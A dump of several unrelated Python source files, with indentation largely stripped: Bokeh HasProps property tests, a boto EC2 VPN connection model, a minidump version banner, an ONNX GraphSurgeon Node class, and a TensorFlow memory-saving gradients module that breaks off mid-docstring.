sub_num = Int(12)
sub_container = List(String)
sub_child = Instance(HasProps)
b = Base()
assert {"child"} == set(b.properties_with_refs())
assert {"num", "container", "child"} == b.properties()
m = Mixin()
assert set(m.properties_with_refs()) == {"mixin_child"}
assert m.properties() == {"mixin_num", "mixin_container", "mixin_child"}
s = Sub()
assert set(s.properties_with_refs()) == {"child", "sub_child", "mixin_child"}
assert s.properties() == {"num", "container", "child", "mixin_num", "mixin_container", "mixin_child", "sub_num", "sub_container", "sub_child"}
# verify caching
assert s.properties_with_refs() is s.properties_with_refs()
assert s.properties() is s.properties()
def test_accurate_dataspecs(self) -> None:
class Base(HasProps):
num = NumberSpec(12)
not_a_dataspec = Float(10)
class Mixin(HasProps):
mixin_num = NumberSpec(14)
class Sub(Base, Mixin):
sub_num = NumberSpec(16)
base = Base()
mixin = Mixin()
sub = Sub()
assert {"num"} == set(base.dataspecs())
assert {"mixin_num"} == set(mixin.dataspecs())
assert {"num", "mixin_num", "sub_num"} == set(sub.dataspecs())
def test_not_serialized(self) -> None:
class NotSerialized(HasProps):
x = Int(12, serialized=False)
y = String("hello")
o = NotSerialized()
assert o.x == 12
assert o.y == 'hello'
# non-serialized props are still in the list of props
assert 'x' in o.properties()
assert 'y' in o.properties()
# but they aren't in the dict of props with values, since their
# values are not important (already included in other values,
# as with the _units properties)
assert 'x' not in o.properties_with_values(include_defaults=True)
assert 'y' in o.properties_with_values(include_defaults=True)
assert 'x' not in o.properties_with_values(include_defaults=False)
assert 'y' not in o.properties_with_values(include_defaults=False)
o.x = 42
o.y = 'world'
assert 'x' not in o.properties_with_values(include_defaults=True)
assert 'y' in o.properties_with_values(include_defaults=True)
assert 'x' not in o.properties_with_values(include_defaults=False)
assert 'y' in o.properties_with_values(include_defaults=False)
def test_readonly(self) -> None:
class Readonly(HasProps):
x = Int(12, readonly=True) # with default
y = Nullable(Int(), readonly=True) # without default
z = String("hello")
o = Readonly()
assert o.x == 12
assert o.y is None
assert o.z == 'hello'
# readonly props are still in the list of props
assert 'x' in o.properties()
assert 'y' in o.properties()
assert 'z' in o.properties()
assert 'x' in o.properties_with_values(include_defaults=True)
assert 'y' in o.properties_with_values(include_defaults=True)
assert 'z' in o.properties_with_values(include_defaults=True)
assert 'x' not in o.properties_with_values(include_defaults=False)
assert 'y' not in o.properties_with_values(include_defaults=False)
assert 'z' not in o.properties_with_values(include_defaults=False)
with pytest.raises(RuntimeError):
o.x = 7
with pytest.raises(RuntimeError):
o.y = 7
o.z = "xyz"
assert o.x == 12
assert o.y is None
assert o.z == 'xyz'
def test_include_defaults(self) -> None:
class IncludeDefaultsTest(HasProps):
x = Int(12)
y = String("hello")
o = IncludeDefaultsTest()
assert o.x == 12
assert o.y == 'hello'
assert 'x' in o.properties_with_values(include_defaults=True)
assert 'y' in o.properties_with_values(include_defaults=True)
assert 'x' not in o.properties_with_values(include_defaults=False)
assert 'y' not in o.properties_with_values(include_defaults=False)
o.x = 42
o.y = 'world'
assert 'x' in o.properties_with_values(include_defaults=True)
assert 'y' in o.properties_with_values(include_defaults=True)
assert 'x' in o.properties_with_values(include_defaults=False)
assert 'y' in o.properties_with_values(include_defaults=False)
def test_include_defaults_with_kwargs(self) -> None:
class IncludeDefaultsKwargsTest(HasProps):
x = Int(12)
y = String("hello")
o = IncludeDefaultsKwargsTest(x=14, y="world")
assert o.x == 14
assert o.y == 'world'
assert 'x' in o.properties_with_values(include_defaults=True)
assert 'y' in o.properties_with_values(include_defaults=True)
assert 'x' in o.properties_with_values(include_defaults=False)
assert 'y' in o.properties_with_values(include_defaults=False)
def test_include_defaults_set_to_same(self) -> None:
class IncludeDefaultsSetToSameTest(HasProps):
x = Int(12)
y = String("hello")
o = IncludeDefaultsSetToSameTest()
assert 'x' in o.properties_with_values(include_defaults=True)
assert 'y' in o.properties_with_values(include_defaults=True)
assert 'x' not in o.properties_with_values(include_defaults=False)
assert 'y' not in o.properties_with_values(include_defaults=False)
# this should no-op
o.x = 12
o.y = "hello"
assert 'x' in o.properties_with_values(include_defaults=True)
assert 'y' in o.properties_with_values(include_defaults=True)
assert 'x' not in o.properties_with_values(include_defaults=False)
assert 'y' not in o.properties_with_values(include_defaults=False)
def test_override_defaults(self) -> None:
class FooBase(HasProps):
x = Int(12)
class FooSub(FooBase):
x = Override(default=14)
def func_default():
return 16
class FooSubSub(FooBase):
x = Override(default=func_default)
f_base = FooBase()
f_sub = FooSub()
f_sub_sub = FooSubSub()
assert f_base.x == 12
assert f_sub.x == 14
assert f_sub_sub.x == 16
assert 12 == f_base.properties_with_values(include_defaults=True)['x']
assert 14 == f_sub.properties_with_values(include_defaults=True)['x']
assert 16 == f_sub_sub.properties_with_values(include_defaults=True)['x']
assert 'x' not in f_base.properties_with_values(include_defaults=False)
assert 'x' not in f_sub.properties_with_values(include_defaults=False)
assert 'x' in f_sub_sub.properties_with_values(include_defaults=False)
# def test_kwargs_init(self) -> None:
# class Foo(HasProps):
# x = String
# y = Int
# z = Float
# f = Foo(x = "hello", y = 14)
# assert f.x == "hello"
# assert f.y == 14
# with pytest.raises(TypeError):
# # This should raise a TypeError: object.__init__() takes no parameters
# g = Foo(z = 3.14, q = "blah")
class Foo(HasProps):
pass
class Bar(HasProps):
pass
class Baz(HasProps):
pass
def test_HasProps_equals() -> None:
class Foo(HasProps):
x = Int(12)
y = String("hello")
z = List(Int, [1,2,3])
class FooUnrelated(HasProps):
x = Int(12)
y = String("hello")
z = List(Int, [1,2,3])
v = Foo().equals(Foo())
assert v is True
v = Foo(x=1).equals(Foo(x=1))
assert v is True
v = Foo(x=1).equals(Foo(x=2))
assert v is False
v = Foo(x=1).equals(1)
assert v is False
v = Foo().equals(FooUnrelated())
assert v is False
def test_HasProps_clone() -> None:
p1 = Plot(width=1000)
c1 = p1.properties_with_values(include_defaults=False)
p2 = p1._clone()
c2 = p2.properties_with_values(include_defaults=False)
assert c1 == c2
def test_Alias() -> None:
class Foo(HasProps):
x = Int(12)
ax = Alias('x')
f = Foo(x=10)
assert f.x == 10
assert f.ax == 10
f.x = 20
assert f.x == 20
assert f.ax == 20
f.ax = 30
assert f.x == 30
assert f.ax == 30
#-----------------------------------------------------------------------------
# Dev API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Private API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
Test___all__ = verify_all(bcp, ALL)
|
# Copyright (c) 2009-2010 Mitch Garnaat http://garnaat.org/
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
import boto
from datetime import datetime
from boto.resultset import ResultSet
"""
Represents a VPN Connection
"""
from boto.ec2.ec2object import TaggedEC2Object
class VpnConnectionOptions(object):
"""
Represents VPN connection options
:ivar static_routes_only: Indicates whether the VPN connection uses static
routes only. Static routes must be used for devices that don't support
BGP.
"""
def __init__(self, static_routes_only=None, tunnel_options=None):
self.static_routes_only = static_routes_only
self.tunnel_options = tunnel_options
def __repr__(self):
return 'VpnConnectionOptions'
def startElement(self, name, attrs, connection):
pass
def endElement(self, name, value, connection):
if name == 'staticRoutesOnly':
self.static_routes_only = True if value == 'true' else False
elif name == 'tunnelOptions':
self.tunnel_options = value
else:
setattr(self, name, value)
class VpnStaticRoute(object):
"""
Represents a static route for a VPN connection.
:ivar destination_cidr_block: The CIDR block associated with the local
subnet of the customer data center.
:ivar source: Indicates how the routes were provided.
:ivar state: The current state of the static route.
"""
def __init__(self, destination_cidr_block=None, source=None, state=None):
self.destination_cidr_block = destination_cidr_block
self.source = source
self.state = state
def __repr__(self):
return 'VpnStaticRoute: %s' % self.destination_cidr_block
def startElement(self, name, attrs, connection):
pass
def endElement(self, name, value, connection):
if name == 'destinationCidrBlock':
self.destination_cidr_block = value
elif name == 'source':
self.source = value
elif name == 'state':
self.state = value
else:
setattr(self, name, value)
class VpnTunnel(object):
"""
Represents telemetry for a VPN tunnel
:ivar outside_ip_address: The Internet-routable IP address of the
virtual private gateway's outside interface.
:ivar status: The status of the VPN tunnel. Valid values: UP | DOWN
:ivar last_status_change: The date and time of the last change in status.
:ivar status_message: If an error occurs, a description of the error.
:ivar accepted_route_count: The number of accepted routes.
"""
def __init__(self, outside_ip_address=None, status=None, last_status_change=None,
status_message=None, accepted_route_count=None):
self.outside_ip_address = outside_ip_address
self.status = status
self.last_status_change = last_status_change
self.status_message = status_message
self.accepted_route_count = accepted_route_count
def __repr__(self):
return 'VpnTunnel: %s' % self.outside_ip_address
def startElement(self, name, attrs, connection):
pass
def endElement(self, name, value, connection):
if name == 'outsideIpAddress':
self.outside_ip_address = value
elif name == 'status':
self.status = value
elif name == 'lastStatusChange':
self.last_status_change = datetime.strptime(value,
'%Y-%m-%dT%H:%M:%S.%fZ')
elif name == 'statusMessage':
self.status_message = value
elif name == 'acceptedRouteCount':
try:
value = int(value)
except ValueError:
boto.log.warning('Error converting code (%s) to int' % value)
self.accepted_route_count = value
else:
setattr(self, name, value)
class VpnConnection(TaggedEC2Object):
"""
Represents a VPN Connection
:ivar id: The ID of the VPN connection.
:ivar state: The current state of the VPN connection.
Valid values: pending | available | deleting | deleted
:ivar customer_gateway_configuration: The configuration information for the
VPN connection's customer gateway (in the native XML format). This
element is always present in the
:class:`boto.vpc.VPCConnection.create_vpn_connection` response;
however, it's present in the
:class:`boto.vpc.VPCConnection.get_all_vpn_connections` response only
if the VPN connection is in the pending or available state.
:ivar type: The type of VPN connection (ipsec.1).
:ivar customer_gateway_id: The ID of the customer gateway at your end of
the VPN connection.
:ivar vpn_gateway_id: The ID of the virtual private gateway
at the AWS side of the VPN connection.
:ivar tunnels: A list of the vpn tunnels (always 2)
:ivar options: The option set describing the VPN connection.
:ivar static_routes: A list of static routes associated with a VPN
connection.
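Example (a sketch, assuming valid AWS credentials and a boto VPC connection)::
    import boto.vpc
    c = boto.vpc.connect_to_region('us-east-1')
    for vpn in c.get_all_vpn_connections():
        print("%s %s" % (vpn.id, vpn.state))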
"""
def __init__(self, connection=None):
super(VpnConnection, self).__init__(connection)
self.id = None
self.state = None
self.customer_gateway_configuration = None
self.type = None
self.customer_gateway_id = None
self.vpn_gateway_id = None
self.tunnels = []
self.options = None
self.static_routes = []
def __repr__(self):
return 'VpnConnection:%s' % self.id
def startElement(self, name, attrs, connection):
retval = super(VpnConnection, self).startElement(name, attrs, connection)
if retval is not None:
return retval
if name == 'vgwTelemetry':
self.tunnels = ResultSet([('item', VpnTunnel)])
return self.tunnels
elif name == 'routes':
self.static_routes = ResultSet([('item', VpnStaticRoute)])
return self.static_routes
elif name == 'options':
self.options = VpnConnectionOptions()
return self.options
return None
def endElement(self, name, value, connection):
if name == 'vpnConnectionId':
self.id = value
elif name == 'state':
self.state = value
elif name == 'customerGatewayConfiguration':
self.customer_gateway_configuration = value
elif name == 'type':
self.type = value
elif name == 'customerGatewayId':
self.customer_gateway_id = value
elif name == 'vpnGatewayId':
self.vpn_gateway_id = value
else:
setattr(self, name, value)
def delete(self, dry_run=False):
return self.connection.delete_vpn_connection(
self.id,
dry_run=dry_run
)
|
__version__ = "0.0.18"
__banner__ = \
"""
# minidump %s
# Author: Tamas Jos @skelsec (skelsecprojects@gmail.com)
""" % __version__
|
#
# SPDX-FileCopyrightText: Copyright (c) 1993-2022 NVIDIA CORPORATION & AFFILIATES. All rights reserved.
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from onnx_graphsurgeon.logger.logger import G_LOGGER
from onnx_graphsurgeon.ir.tensor import Tensor
from onnx_graphsurgeon.util import misc
from collections import OrderedDict
from typing import List, Dict
class Node(object):
def __init__(
self,
op: str,
name: str = None,
attrs: Dict[str, object] = None,
inputs: List["Tensor"] = None,
outputs: List["Tensor"] = None,
):
"""
A node represents an operation in a graph. It consumes zero or more Tensors and produces zero or more Tensors.
Args:
op (str): The operation this node performs.
name (str): The name of this node.
attrs (Dict[str, object]): A dictionary that maps attribute names to their values.
inputs (List[Tensor]): A list of zero or more input Tensors.
outputs (List[Tensor]): A list of zero or more output Tensors.
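Example (a sketch; ``a``, ``b`` and ``c`` are assumed to be existing Tensor instances)::
    add = Node(op="Add", name="add_0", inputs=[a, b], outputs=[c])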
"""
self.op = op
self.name = misc.default_value(name, "")
self.attrs = misc.default_value(attrs, OrderedDict())
self.inputs = misc.SynchronizedList(self, field_name="outputs", initial=misc.default_value(inputs, []))
self.outputs = misc.SynchronizedList(self, field_name="inputs", initial=misc.default_value(outputs, []))
def i(self, tensor_idx=0, producer_idx=0):
"""
Convenience function to get a producer node of one of this node's input tensors.
Note that the parameters are swapped compared to the o() function; this is because tensors are likely to have only a single producer.
For example:
::
assert node.i() == node.inputs[0].inputs[0]
assert node.i(1, 2) == node.inputs[1].inputs[2]
Args:
tensor_idx (int): The index of the input tensor of this node. Defaults to 0.
producer_idx (int): The index of the producer of the input tensor, if the tensor has multiple producers. Defaults to 0
Returns:
Node: The specified producer (input) node.
"""
return self.inputs[tensor_idx].inputs[producer_idx]
def o(self, consumer_idx=0, tensor_idx=0):
"""
Convenience function to get a consumer node of one of this node's output tensors.
For example:
::
assert node.o() == node.outputs[0].outputs[0]
assert node.o(2, 1) == node.outputs[1].outputs[2]
Args:
consumer_idx (int): The index of the consumer of the output tensor. Defaults to 0.
tensor_idx (int): The index of the output tensor of this node, if the node has multiple outputs. Defaults to 0.
Returns:
Node: The specified consumer (output) node
"""
return self.outputs[tensor_idx].outputs[consumer_idx]
def __setattr__(self, name, value):
if name in ["inputs", "outputs"]:
try:
getattr(self, name).clear()
getattr(self, name).extend(value)
except AttributeError:
super().__setattr__(name, value)
else:
super().__setattr__(name, value)
def copy(self, inputs: List["Tensor"] = None, outputs: List["Tensor"] = None, tensor_map=None):
"""
Makes a shallow copy of this node, overriding input and output information.
Note: Generally, you should only ever make a copy of a Graph.
"""
from onnx_graphsurgeon.ir.graph import Graph
new_attrs = OrderedDict()
for name, attr in self.attrs.items():
if isinstance(attr, Graph):
new_attrs[name] = attr.copy(tensor_map)
else:
new_attrs[name] = attr
return Node(self.op, self.name, new_attrs, inputs=inputs, outputs=outputs)
def __str__(self):
ret = "{:} ({:})".format(self.name, self.op)
def add_io(name, io):
nonlocal ret
ret += "\n\t{:}: [".format(name)
for elem in io:
ret += "\n\t\t{:}".format(elem)
ret += "\n\t]"
add_io("Inputs", self.inputs)
add_io("Outputs", self.outputs)
if self.attrs:
ret += "\nAttributes: {:}".format(self.attrs)
return ret
def __repr__(self):
return self.__str__()
def __eq__(self, other):
"""
Check whether two nodes are equal by comparing name, attributes, op, inputs, and outputs.
"""
G_LOGGER.verbose("Comparing node: {:} with {:}".format(self.name, other.name))
attrs_match = self.name == other.name and self.op == other.op and self.attrs == other.attrs
inputs_match = len(self.inputs) == len(other.inputs) and all(
[inp == other_inp for inp, other_inp in zip(self.inputs, other.inputs)]
)
outputs_match = len(self.outputs) == len(other.outputs) and all(
[out == other_out for out, other_out in zip(self.outputs, other.outputs)]
)
return attrs_match and inputs_match and outputs_match
|
from toposort import toposort
import contextlib
import numpy as np
import tensorflow as tf
import tensorflow.contrib.graph_editor as ge
import time
import sys
sys.setrecursionlimit(10000)
# refers back to current module if we decide to split helpers out
util = sys.modules[__name__]
# getting rid of "WARNING:tensorflow:VARIABLES collection name is deprecated"
setattr(tf.GraphKeys, "VARIABLES", "variables")
# save original gradients since tf.gradient could be monkey-patched to point
# to our version
from tensorflow.python.ops import gradients as tf_gradients_lib
tf_gradients = tf_gradients_lib.gradients
MIN_CHECKPOINT_NODE_SIZE=1024 # use lower value during testing
# specific versions we can use to do process-wide replacement of tf.gradients
def gradients_speed(ys, xs, grad_ys=None, **kwargs):
return gradients(ys, xs, grad_ys, checkpoints='speed', **kwargs)
def gradients_memory(ys, xs, grad_ys=None, **kwargs):
return gradients(ys, xs, grad_ys, checkpoints='memory', **kwargs)
def gradients_collection(ys, xs, grad_ys=None, **kwargs):
return gradients(ys, xs, grad_ys, checkpoints='collection', **kwargs)
def gradients(ys, xs, grad_ys=None, checkpoints='collection', **kwargs):
'''
Authors: Tim Salimans & Yaroslav Bulatov
memory efficient gradient implementation inspired by "Training Deep Nets with Sublinear Memory Cost"
by Chen et al. 2016 (https://arxiv.org/abs/1604.06174)
ys,xs,grad_ys,kwargs are the arguments to standard tensorflow tf.gradients
(https://www.tensorflow.org/versions/r0.12/api_docs/python/train.html#gradients)
'checkpoints' can either be
- a list consisting of tensors from the forward pass of the neural net
that we should re-use when calculating the gradients in the backward pass
all other tensors that do not appear in this list will be re-computed
- a string specifying how this list should be determined. Currently we support:
- 'speed': checkpoint all outputs of convolutions and matmuls. these ops are usually the most expensive,
so checkpointing them maximizes the running speed
(this is a good option if nonlinearities, concats, batchnorms, etc are taking up a lot of memory)
- 'memory': try to minimize the memory usage
(currently using a very simple strategy that identifies a number of bottleneck tensors in the graph to checkpoint)
- 'collection': look for a tensorflow collection named 'checkpoints', which holds the tensors to checkpoint
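Usage sketch (not from the original docstring; `loss` and `params` are placeholders
for your own graph tensors and variables):
    grads = gradients_memory(loss, params)
    # equivalent to:
    grads = gradients(loss, params, checkpoints='memory')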
'''
# print("Calling memsaving gradients with", checkpoints)
if not isinstance(ys,list):
ys = [ys]
if not isinstance(xs,list):
xs = [xs]
bwd_ops = ge.get_backward_walk_ops([y.op for y in ys],
inclusive=True)
debug_print("bwd_ops: %s", bwd_ops)
# forward ops are all ops that are candidates for recomputation
fwd_ops = ge.get_forward_walk_ops([x.op for x in xs],
inclusive=True,
within_ops=bwd_ops)
debug_print("fwd_ops: %s", fwd_ops)
# exclude ops with no inputs
fwd_ops = [op for op in fwd_ops if op.inputs]
# don't recompute xs, remove variables
xs_ops = _to_ops(xs)
fwd_ops = [op for op in fwd_ops if not op in xs_ops]
fwd_ops = [op for op in fwd_ops if not '/assign' in op.name]
fwd_ops = [op for op in fwd_ops if not '/Assign' in op.name]
fwd_ops = [op for op in fwd_ops if not '/read' in op.name]
ts_all = ge.filter_ts(fwd_ops, True) # get the tensors
ts_all = [t for t in ts_all if '/read' not in t.name]
ts_all = set(ts_all) - set(xs) - set(ys)
# construct list of tensors to checkpoint during forward pass, if not
# given as input
if type(checkpoints) is not list:
if checkpoints == 'collection':
checkpoints = tf.get_collection('checkpoints')
elif checkpoints == 'speed':
# checkpoint all expensive ops to maximize running speed
checkpoints = ge.filter_ts_from_regex(fwd_ops, 'conv2d|Conv|MatMul')
elif checkpoints == 'memory':
# remove very small tensors and some weird ops
def fixdims(t): # tf.Dimension values are not compatible with int, convert manually
try:
return [int(e if e.value is not None else 64) for e in t]
except:
return [0] # unknown shape
ts_all = [t for t in ts_all if np.prod(fixdims(t.shape)) > MIN_CHECKPOINT_NODE_SIZE]
ts_all = [t for t in ts_all if 'L2Loss' not in t.name]
ts_all = [t for t in ts_all if 'entropy' not in t.name]
ts_all = [t for t in ts_all if 'FusedBatchNorm' not in t.name]
ts_all = [t for t in ts_all if 'Switch' not in t.name]
ts_all = [t for t in ts_all if 'dropout' not in t.name]
# DV: FP16_FIX - need to add 'Cast' layer here to make it work for FP16
ts_all = [t for t in ts_all if 'Cast' not in t.name]
# filter out all tensors that are inputs of the backward graph
with util.capture_ops() as bwd_ops:
tf_gradients(ys, xs, grad_ys, **kwargs)
bwd_inputs = [t for op in bwd_ops for t in op.inputs]
# list of tensors in forward graph that is in input to bwd graph
ts_filtered = list(set(bwd_inputs).intersection(ts_all))
debug_print("Using tensors %s", ts_filtered)
# try two slightly different ways of getting bottlenecks tensors
# to checkpoint
for ts in [ts_filtered, ts_all]:
# get all bottlenecks in the graph
bottleneck_ts = []
for t in ts:
b = set(ge.get_backward_walk_ops(t.op, inclusive=True, within_ops=fwd_ops))
f = set(ge.get_forward_walk_ops(t.op, inclusive=False, within_ops=fwd_ops))
# check that there are no shortcuts
b_inp = set([inp for op in b for inp in op.inputs]).intersection(ts_all)
f_inp = set([inp for op in f for inp in op.inputs]).intersection(ts_all)
if not set(b_inp).intersection(f_inp) and len(b_inp)+len(f_inp) >= len(ts_all):
bottleneck_ts.append(t) # we have a bottleneck!
else:
debug_print("Rejected bottleneck candidate and ops %s", [t] + list(set(ts_all) - set(b_inp) - set(f_inp)))
# success? or try again without filtering?
if len(bottleneck_ts) >= np.sqrt(len(ts_filtered)): # yes, enough bottlenecks found!
break
if not bottleneck_ts:
raise Exception('unable to find bottleneck tensors! please provide checkpoint nodes manually, or use checkpoints="speed".')
# sort the bottlenecks
bottlenecks_sorted_lists = tf_toposort(bottleneck_ts, within_ops=fwd_ops)
sorted_bottlenecks = [t for ts in bottlenecks_sorted_lists for t in ts]
# save an approximately optimal number ~ sqrt(N)
N = len(ts_filtered)
if len(bottleneck_ts) <= np.ceil(np.sqrt(N)):
checkpoints = sorted_bottlenecks
else:
step = int(np.ceil(len(bottleneck_ts) / np.sqrt(N)))
checkpoints = sorted_bottlenecks[step::step]
else:
raise Exception('%s is unsupported input for "checkpoints"' % (checkpoints,))
checkpoints = list(set(checkpoints).intersection(ts_all))
# at this point automatic selection happened and checkpoints is list of nodes
assert isinstance(checkpoints, list)
debug_print("Checkpoint nodes used: %s", checkpoints)
# better error handling of special cases
# xs are already handled as checkpoint nodes, so no need to include them
xs_intersect_checkpoints = set(xs).intersection(set(checkpoints))
if xs_intersect_checkpoints:
debug_print("Warning, some input nodes are also checkpoint nodes: %s",
xs_intersect_checkpoints)
ys_intersect_checkpoints = set(ys).intersection(set(checkpoints))
debug_print("ys: %s, checkpoints: %s, intersect: %s", ys, checkpoints,
ys_intersect_checkpoints)
# saving an output node (ys) gives no benefit in memory while creating
# new edge cases, exclude them
if ys_intersect_checkpoints:
debug_print("Warning, some output nodes are also checkpoint nodes: %s",
format_ops(ys_intersect_checkpoints))
# remove initial and terminal nodes from checkpoints list if present
checkpoints = list(set(checkpoints) - set(ys) - set(xs))
# check that we have some nodes to checkpoint
if not checkpoints:
raise Exception('no checkpoint nodes found or given as input!')
# disconnect dependencies between checkpointed tensors
checkpoints_disconnected = {}
for x in checkpoints:
if x.op and x.op.name is not None:
grad_node = tf.stop_gradient(x, name=x.op.name+"_sg")
else:
grad_node = tf.stop_gradient(x)
checkpoints_disconnected[x] = grad_node
# partial derivatives to the checkpointed tensors and xs
ops_to_copy = fast_backward_ops(seed_ops=[y.op for y in ys],
stop_at_ts=checkpoints, within_ops=fwd_ops)
debug_print("Found %s ops to copy within fwd_ops %s, seed %s, stop_at %s",
len(ops_to_copy), fwd_ops, [r.op for r in ys], checkpoints)
debug_print("ops_to_copy = %s", ops_to_copy)
debug_print("Processing list %s", ys)
copied_sgv, info = ge.copy_with_input_replacements(ge.sgv(ops_to_copy), {})
for origin_op, op in info._transformed_ops.items():
op._set_device(origin_op.node_def.device)
copied_ops = info._transformed_ops.values()
debug_print("Copied %s to %s", ops_to_copy, copied_ops)
ge.reroute_ts(checkpoints_disconnected.values(), checkpoints_disconnected.keys(), can_modify=copied_ops)
debug_print("Rewired %s in place of %s restricted to %s",
checkpoints_disconnected.values(), checkpoints_disconnected.keys(), copied_ops)
# get gradients with respect to current boundary + original x's
copied_ys = [info._transformed_ops[y.op]._outputs[0] for y in ys]
boundary = list(checkpoints_disconnected.values())
dv = tf_gradients(ys=copied_ys, xs=boundary+xs, grad_ys=grad_ys, **kwargs)
debug_print("Got gradients %s", dv)
debug_print("for %s", copied_ys)
debug_print("with respect to %s", boundary+xs)
inputs_to_do_before = [y.op for y in ys]
if grad_ys is not None:
inputs_to_do_before += grad_ys
wait_to_do_ops = list(copied_ops) + [g.op for g in dv if g is not None]
my_add_control_inputs(wait_to_do_ops, inputs_to_do_before)
# partial derivatives to the checkpointed nodes
# dictionary of "node: backprop" for nodes in the boundary
d_checkpoints = {r: dr for r,dr in zip(checkpoints_disconnected.keys(),
dv[:len(checkpoints_disconnected)])}
# partial derivatives to xs (usually the params of the neural net)
d_xs = dv[len(checkpoints_disconnected):]
# incorporate derivatives flowing through the checkpointed nodes
checkpoints_sorted_lists = tf_toposort(checkpoints, within_ops=fwd_ops)
for ts in checkpoints_sorted_lists[::-1]:
debug_print("Processing list %s", ts)
checkpoints_other = [r for r in checkpoints if r not in ts]
checkpoints_disconnected_other = [checkpoints_disconnected[r] for r in checkpoints_other]
# copy the part of the graph below the current checkpoint node, stopping
# at the other checkpoint nodes
ops_to_copy = fast_backward_ops(within_ops=fwd_ops, seed_ops=[r.op for r in ts], stop_at_ts=checkpoints_other)
debug_print("Found %s ops to copy within %s, seed %s, stop_at %s",
len(ops_to_copy), fwd_ops, [r.op for r in ts],
checkpoints_other)
debug_print("ops_to_copy = %s", ops_to_copy)
if not ops_to_copy: # we're done!
break
copied_sgv, info = ge.copy_with_input_replacements(ge.sgv(ops_to_copy), {})
for origin_op, op in info._transformed_ops.items():
op._set_device(origin_op.node_def.device)
copied_ops = info._transformed_ops.values()
debug_print("Copied %s to %s", ops_to_copy, copied_ops)
ge.reroute_ts(checkpoints_disconnected_other, checkpoints_other, can_modify=copied_ops)
debug_print("Rewired %s in place of %s restricted to %s",
checkpoints_disconnected_other, checkpoints_other, copied_ops)
# gradient flowing through the checkpointed node
boundary = [info._transformed_ops[r.op]._outputs[0] for r in ts]
substitute_backprops = [d_checkpoints[r] for r in ts]
dv = tf_gradients(boundary,
checkpoints_disconnected_other+xs,
grad_ys=substitute_backprops, **kwargs)
debug_print("Got gradients %s", dv)
debug_print("for %s", boundary)
debug_print("with respect to %s", checkpoints_disconnected_other+xs)
debug_print("with boundary backprop substitutions %s", substitute_backprops)
inputs_to_do_before = [d_checkpoints[r].op for r in ts]
wait_to_do_ops = list(copied_ops) + [g.op for g in dv if g is not None]
my_add_control_inputs(wait_to_do_ops, inputs_to_do_before)
# partial derivatives to the checkpointed nodes
for r, dr in zip(checkpoints_other, dv[:len(checkpoints_other)]):
if dr is not None:
if d_checkpoints[r] is None:
d_checkpoints[r] = dr
else:
d_checkpoints[r] += dr
def _unsparsify(x):
if not isinstance(x, tf.IndexedSlices):
return x
assert x.dense_shape is not None, "memory_saving_gradients encountered sparse gradients of unknown shape"
indices = x.indices
while indices.shape.ndims < x.values.shape.ndims:
indices = tf.expand_dims(indices, -1)
return tf.scatter_nd(indices, x.values, x.dense_shape)
# partial derivatives to xs (usually the params of the neural net)
d_xs_new = dv[len(checkpoints_other):]
for j in range(len(xs)):
if d_xs_new[j] is not None:
if d_xs[j] is None:
d_xs[j] = _unsparsify(d_xs_new[j])
else:
d_xs[j] += _unsparsify(d_xs_new[j])
return d_xs
def tf_toposort(ts, within_ops=None):
all_ops = ge.get_forward_walk_ops([x.op for x in ts], within_ops=within_ops)
deps = {}
for op in all_ops:
for o in op.outputs:
deps[o] = set(op.inputs)
sorted_ts = toposort(deps)
# only keep the tensors from our original list
ts_sorted_lists = []
for l in sorted_ts:
keep = list(set(l).intersection(ts))
if keep:
ts_sorted_lists.append(keep)
return ts_sorted_lists
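# A minimal sketch (not part of the original module) of what tf_toposort()
# returns: tensors grouped by topological level, earliest level first. The
# tiny graph below is hypothetical and assumes TensorFlow 1.x graph mode,
# relying on the module-level `tf`, `ge` and `toposort` imports used above.
def _tf_toposort_example():
    a = tf.constant([[1.0, 2.0]], name="toposort_a")
    b = tf.matmul(a, tf.constant([[1.0], [1.0]]), name="toposort_b")
    c = tf.nn.relu(b, name="toposort_c")
    # b feeds c, so the result is [[b], [c]]; the recomputation loop in the
    # gradient routine above walks these levels in reverse order.
    return tf_toposort([b, c])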
def fast_backward_ops(within_ops, seed_ops, stop_at_ts):
bwd_ops = set(ge.get_backward_walk_ops(seed_ops, stop_at_ts=stop_at_ts))
ops = bwd_ops.intersection(within_ops).difference([t.op for t in stop_at_ts])
return list(ops)
@contextlib.contextmanager
def capture_ops():
"""Decorator to capture ops created in the block.
with capture_ops() as ops:
# create some ops
print(ops) # => prints ops created.
"""
micros = int(time.time()*10**6)
scope_name = str(micros)
op_list = []
with tf.name_scope(scope_name):
yield op_list
g = tf.get_default_graph()
op_list.extend(ge.select_ops(scope_name+"/.*", graph=g))
def _to_op(tensor_or_op):
if hasattr(tensor_or_op, "op"):
return tensor_or_op.op
return tensor_or_op
def _to_ops(iterable):
if not _is_iterable(iterable):
return iterable
return [_to_op(i) for i in iterable]
def _is_iterable(o):
try:
_ = iter(o)
except Exception:
return False
return True
DEBUG_LOGGING=False
def debug_print(s, *args):
"""Like logger.log, but also replaces all TensorFlow ops/tensors with their
names. Sensitive to value of DEBUG_LOGGING, see enable_debug/disable_debug
Usage:
